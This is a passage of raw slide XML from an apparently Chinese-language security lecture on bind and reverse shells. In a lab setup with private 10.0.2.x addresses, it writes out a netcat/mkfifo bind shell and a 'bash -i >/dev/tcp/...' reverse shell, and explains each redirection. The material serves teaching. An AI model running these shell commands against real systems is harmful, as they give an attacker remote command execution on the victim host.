                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>f;mkfifo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/f;   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建管道文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>#cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/f | /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1 |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>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在攻击机上输入命令，该命令在靶机上运行，并且在攻击机上显示命令执行的结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="566418874"/>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7E3B4-FD14-42CC-91D0-9D8C519F5212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3863B227-E808-4959-A6AC-04539A574666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>客户端监听，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>建立连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="266700" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（客户端）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 4567</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="266700" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.8: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-342900" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bash –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> &gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/10.0.2.4/4567</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的输出重定向到攻击机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4567</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，标准输出用描述符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>表示，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bash-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>代表交互性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-342900" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> bash –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/10.0.2.4/4567  2&gt;&amp;1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将错误输出也重定向到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-342900" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bash –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> &gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/10.0.2.4/4567  2&gt;&amp;1  0&lt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件描述符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>表示标准输入，表示从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
